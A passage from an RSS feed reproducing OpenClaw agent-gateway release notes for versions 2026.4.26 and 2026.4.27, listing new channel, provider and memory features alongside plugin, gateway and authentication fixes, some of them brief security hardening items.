<li>Gateway/startup: skip inherited workspace startup memory for sandboxed spawned sessions without real-workspace write access, so <code>/new</code> no longer preloads host workspace memory into isolated child runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344082702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73611" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73611/hovercard" href="https://github.com/openclaw/openclaw/pull/73611">#73611</a>) Thanks @drobison00.</li>
<li>Agents/tool policy: validate caller group IDs against session or spawned context before applying group-scoped tool policies or persisting gateway group metadata, so forged group IDs cannot unlock more permissive tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345261616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73720/hovercard" href="https://github.com/openclaw/openclaw/pull/73720">#73720</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Commands: keep channel-prefixed owner allowlist entries scoped to matching providers so webchat command contexts cannot inherit external channel owners. Thanks @zsxsoft.</li>
<li>Auth/device pairing: bound bootstrap handoff token issuance, redemption, and approved pairing baselines to the documented per-role scope allowlist, so bootstrap approvals cannot persistently grant <code>operator.admin</code>, <code>operator.pairing</code>, or <code>node.exec</code> scopes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Providers/GitHub Copilot: support the GUI/RPC wizard device-code auth flow so onboarding from non-TTY clients (gateway RPC bridge, GUI wizards) completes instead of returning empty profiles. Dangerous-state handling now distinguishes <code>access_denied</code> and <code>expired_token</code> from transport errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340731383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73290" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73290/hovercard" href="https://github.com/openclaw/openclaw/pull/73290">#73290</a>) Thanks @indierawk2k2.</li>
<li>Installer/Linux: warn before switching an unwritable npm global prefix to <code>~/.npm-global</code>, then tell users to run future global updates with <code>npm i -g openclaw@latest</code> without <code>sudo</code> so npm keeps using the redirected user prefix. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067034134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44365/hovercard" href="https://github.com/openclaw/openclaw/issues/44365">#44365</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102245984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50479" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50479/hovercard" href="https://github.com/openclaw/openclaw/pull/50479">#50479</a>. Thanks @Sayeem3051.</li>
<li>Gateway/plugins: enable the native <code>require()</code> fast path on Windows for bundled plugin modules so plugin loading uses <code>require()</code> instead of Jiti's transform pipeline, reducing startup from ~39s to ~2s on typical 6-plugin setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288746847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68656/hovercard" href="https://github.com/openclaw/openclaw/issues/68656">#68656</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348588169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74173/hovercard" href="https://github.com/openclaw/openclaw/pull/74173">#74173</a>) Thanks @galiniliev.</li>
<li>macOS app: detect stale Gateway TLS certificate pins, automatically repair trusted Tailscale Serve rotations, and surface paired-but-disconnected Mac companion nodes so partial Gateway connections no longer look healthy. Thanks @guti.</li>
</ul>
<h2>2026.4.27</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.4.26]]></title>
<description><![CDATA[2026.4.26
Changes

Channels/QQBot: add full group chat support (history tracking, @-mention gating, activation modes, per-group config, FIFO message queue with deliver debounce), C2C stream_messages streaming with a StreamingController lifecycle manager, unified sendMedia with chunked upload for ...]]></description>
<link>https://tsecurity.de/de/3469725/downloads/openclaw-2026426/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3469725/downloads/openclaw-2026426/</guid>
<pubDate>Tue, 28 Apr 2026 03:16:14 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.26</h2>
<h3>Changes</h3>
<ul>
<li>Channels/QQBot: add full group chat support (history tracking, @-mention gating, activation modes, per-group config, FIFO message queue with deliver debounce), C2C <code>stream_messages</code> streaming with a <code>StreamingController</code> lifecycle manager, unified <code>sendMedia</code> with chunked upload for large files, and refactor the engine into pipeline stages, focused outbound submodules, builtin slash-command modules, and explicit DI ports via <code>createEngineAdapters()</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316471394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70624" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70624/hovercard" href="https://github.com/openclaw/openclaw/pull/70624">#70624</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>Channels/Yuanbao: register the Tencent Yuanbao external channel plugin (<code>openclaw-plugin-yuanbao</code>) in the official channel catalog, contract suites, and community plugin docs, with a new <code>docs/channels/yuanbao.md</code> quick-start guide for WebSocket bot DMs and group chats. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335031388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72756" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72756/hovercard" href="https://github.com/openclaw/openclaw/pull/72756">#72756</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Control UI/Talk: add a generic browser realtime transport contract, Google Live browser Talk sessions with constrained ephemeral tokens, and a Gateway relay for backend-only realtime voice plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
<li>CLI/models: route provider-filtered model listing through an explicit source plan so user config, installed manifest rows, Provider Index previews, and scoped runtime fallbacks keep a stable authority order without adding another catalog cache. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Providers: add Cerebras as a bundled plugin with onboarding, static model catalog, docs, and manifest-owned endpoint metadata.</li>
<li>Memory/OpenAI-compatible: add optional <code>memorySearch.inputType</code>, <code>queryInputType</code>, and <code>documentInputType</code> config for asymmetric embedding endpoints, including direct query embeddings and provider batch indexing. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226871410" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63313" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63313/hovercard" href="https://github.com/openclaw/openclaw/pull/63313">#63313</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203912952" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60727" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60727/hovercard" href="https://github.com/openclaw/openclaw/issues/60727">#60727</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HOYALIM/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HOYALIM">@HOYALIM</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prospect1314521/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prospect1314521">@prospect1314521</a>.</li>
<li>Ollama/memory: add model-specific retrieval query prefixes for <code>nomic-embed-text</code>, <code>qwen3-embedding</code>, and <code>mxbai-embed-large</code> memory-search queries while leaving document batches unchanged. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070329121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45013/hovercard" href="https://github.com/openclaw/openclaw/pull/45013">#45013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/laolin5564/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/laolin5564">@laolin5564</a>.</li>
<li>Plugins/providers: move pre-runtime model-id normalization, endpoint host metadata, OpenAI-compatible request-family hints, model-catalog aliases/suppressions, OpenAI stale Spark suppression, and reusable startup metadata snapshots into plugin manifests so core no longer carries bundled-provider routing tables or repeated manifest rebuilds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: deprecate direct plugin config load/write helpers in favor of passed runtime snapshots plus transactional mutation helpers with explicit restart follow-up policy, scanner guardrails, runtime warnings, and revision-based cache invalidation.</li>
<li>Plugins/install: allow <code>OPENCLAW_PLUGIN_STAGE_DIR</code> to contain layered runtime-dependency roots, resolving read-only preinstalled deps before installing missing deps into the final writable root. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332156784" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72396/hovercard" href="https://github.com/openclaw/openclaw/issues/72396">#72396</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liorb-mountapps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liorb-mountapps">@liorb-mountapps</a>.</li>
<li>Control UI: add a raw config pending-changes diff panel that parses JSON5, redacts sensitive values until reveal, and avoids fake raw-edit callbacks when opening the panel. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041206573" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39831" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39831/hovercard" href="https://github.com/openclaw/openclaw/issues/39831">#39831</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085689943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48621/hovercard" href="https://github.com/openclaw/openclaw/pull/48621">#48621</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077071028" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46654" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46654/hovercard" href="https://github.com/openclaw/openclaw/pull/46654">#46654</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JiajunBernoulli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JiajunBernoulli">@JiajunBernoulli</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI: polish the quick settings dashboard grid so common cards align across desktop, tablet, and mobile layouts without wasting horizontal space. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Matrix/E2EE: add <code>openclaw matrix encryption setup</code> to enable Matrix encryption, bootstrap recovery, and print verification status from one setup flow. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Agents/compaction: add an opt-in <code>agents.defaults.compaction.maxActiveTranscriptBytes</code> preflight trigger that runs normal local compaction when the active JSONL grows too large, requiring transcript rotation so successful compaction moves future turns onto a smaller successor file instead of raw byte-splitting history. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/migration: add <code>openclaw migrate</code> with plan, dry-run, JSON, pre-migration backup, onboarding detection, archive-only reports, a Claude Code/Desktop importer, and a Hermes importer for configuration, memory/plugin hints, model providers, MCP servers, skills, commands, and supported credentials. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/NousResearch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NousResearch">@NousResearch</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents/LSP: terminate bundled stdio LSP process trees during runtime disposal and Gateway shutdown, so nested children such as <code>tsserver</code> do not survive stop or restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331967579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72357/hovercard" href="https://github.com/openclaw/openclaw/issues/72357">#72357</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Gateway/device tokens: stop echoing rotated bearer tokens from shared/admin <code>device.token.rotate</code> responses while preserving the same-device token handoff needed by token-only clients before reconnect. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264445683" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66773" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66773/hovercard" href="https://github.com/openclaw/openclaw/issues/66773">#66773</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MoerAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MoerAI">@MoerAI</a>.</li>
<li>Control UI/Talk: keep Google Live browser sessions on the WebSocket transport instead of falling back to WebRTC, validate browser Google Live WebSocket endpoints, cap Gateway relay sessions per browser connection, and remove stale browser-native voice buttons that did not use the configured Talk/TTS provider. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Gateway/startup: reuse config snapshot plugin manifests for startup auto-enable, config validation, and plugin bootstrap planning, including authored source config and disabled setup-probe handling, so restrictive allowlists avoid duplicate manifest/config passes during boot. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/subagents: enforce <code>subagents.allowAgents</code> for explicit same-agent <code>sessions_spawn(agentId=...)</code> calls instead of auto-allowing requester self-targets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336117666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72827/hovercard" href="https://github.com/openclaw/openclaw/issues/72827">#72827</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oiGaDio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oiGaDio">@oiGaDio</a>.</li>
<li>ACP/sessions_spawn: let explicit <code>sessions_spawn(runtime="acp")</code> bootstrap turns run while <code>acp.dispatch.enabled=false</code> still blocks automatic ACP thread dispatch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229973496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63591" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63591/hovercard" href="https://github.com/openclaw/openclaw/issues/63591">#63591</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>CLI/update: install npm global updates into a verified temporary prefix before swapping the package tree into place, preventing mixed old/new installs and stale packaged files from breaking <code>openclaw update</code> verification. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway: skip CLI startup self-respawn for foreground gateway runs so low-memory Linux/Node 24 hosts start through the same path as direct <code>dist/index.js</code> without hanging before logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334377532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72720" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72720/hovercard" href="https://github.com/openclaw/openclaw/issues/72720">#72720</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sign-2025/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sign-2025">@sign-2025</a>.</li>
<li>Google Meet: route local Chrome joins through OpenClaw browser control, grant Meet media permissions, pin local Chrome audio defaults to <code>BlackHole 2ch</code>, and use the configured OpenClaw browser profile so joined agents no longer show <code>Permission needed</code> or use raw/default Chrome state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>Plugins/discovery: follow symlinked plugin directories in global and workspace plugin roots while keeping broken links ignored and existing package safety checks in place. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4030788779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36754" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/36754/hovercard" href="https://github.com/openclaw/openclaw/issues/36754">#36754</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334070522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72695" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72695/hovercard" href="https://github.com/openclaw/openclaw/pull/72695">#72695</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225496480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63206" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63206/hovercard" href="https://github.com/openclaw/openclaw/pull/63206">#63206</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Quackstro/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Quackstro">@Quackstro</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ming1523/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ming1523">@ming1523</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xsfX20/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xsfX20">@xsfX20</a>.</li>
<li>Plugins/install: skip test files and directories during install security scans while still force-scanning declared runtime entrypoints, so packaged test mocks no longer block plugin installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265051521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66840" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66840/hovercard" href="https://github.com/openclaw/openclaw/issues/66840">#66840</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4267070478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67050" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67050/hovercard" href="https://github.com/openclaw/openclaw/pull/67050">#67050</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/saurabhjain1592/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/saurabhjain1592">@saurabhjain1592</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>.</li>
<li>Plugins/install: allow exact package-manager peer links back to the trusted OpenClaw host package during install security scans while continuing to block spoofed or nested escaping <code>node_modules</code> symlinks. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319318874" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70819/hovercard" href="https://github.com/openclaw/openclaw/pull/70819">#70819</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fgabelmannjr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fgabelmannjr">@fgabelmannjr</a>.</li>
<li>Plugins/install: resolve plugin install destinations from the active profile state dir across CLI, ClawHub, marketplace, local path, and channel setup installs, so <code>openclaw --profile &lt;name&gt; plugins install ...</code> no longer writes into the default profile. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306498991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69960/hovercard" href="https://github.com/openclaw/openclaw/issues/69960">#69960</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306634637" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69971" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69971/hovercard" href="https://github.com/openclaw/openclaw/pull/69971">#69971</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FrancisLyman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FrancisLyman">@FrancisLyman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Plugins/registry: suppress duplicate-plugin startup warnings when a tracked npm-installed plugin intentionally overrides the bundled plugin with the same id. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48673/hovercard" href="https://github.com/openclaw/openclaw/pull/48673">#48673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abdushsk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abdushsk">@abdushsk</a>.</li>
<li>Plugins/startup: reuse canonical realpath lookups throughout each plugin discovery pass, including package and manifest boundary checks, so Windows npm-global startups no longer repeat expensive path resolution for the same plugin roots. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251504394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65733/hovercard" href="https://github.com/openclaw/openclaw/issues/65733">#65733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/welfo-beo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/welfo-beo">@welfo-beo</a>.</li>
<li>Gateway/proxy: pass <code>ALL_PROXY</code> / <code>all_proxy</code> into the global Undici env-proxy dispatcher and provider proxy-fetch helper while keeping SSRF trusted-proxy auto-upgrade on <code>HTTP_PROXY</code> / <code>HTTPS_PROXY</code> only, so gateway/provider calls honor all-proxy setups without weakening guarded fetches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4062862928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43821" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43821/hovercard" href="https://github.com/openclaw/openclaw/issues/43821">#43821</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063492398" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43919" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43919/hovercard" href="https://github.com/openclaw/openclaw/pull/43919">#43919</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RickyTong1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RickyTong1">@RickyTong1</a>.</li>
<li>Reply/link understanding: keep media and link preprocessing on stable runtime entrypoints and continue with raw message content if optional enrichment fails, so URL-bearing messages are no longer dropped after stale runtime chunk upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287281423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68466" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68466/hovercard" href="https://github.com/openclaw/openclaw/issues/68466">#68466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/songshikang0111/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/songshikang0111">@songshikang0111</a>.</li>
<li>Discord: persist routed model-picker overrides when the hidden <code>/model</code> dispatch succeeds but the bound thread session store is still stale, including LM Studio suffixed model ids. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208328194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61473" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61473/hovercard" href="https://github.com/openclaw/openclaw/pull/61473">#61473</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</li>
<li>Nodes/CLI: add <code>openclaw nodes remove --node &lt;id|name|ip&gt;</code> and <code>node.pair.remove</code> so stale gateway-owned node pairing records can be cleaned without hand-editing state files.</li>
<li>Gateway: include the connecting client and fresh presence version in the initial <code>hello-ok</code> snapshot, so clients no longer need a follow-up event before seeing themselves online.</li>
<li>Docker: install the CA certificate bundle in the slim runtime image so HTTPS calls from containerized gateways no longer fail TLS setup after the <code>bookworm-slim</code> base switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335522675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72787" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72787/hovercard" href="https://github.com/openclaw/openclaw/issues/72787">#72787</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryuhaneul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryuhaneul">@ryuhaneul</a>.</li>
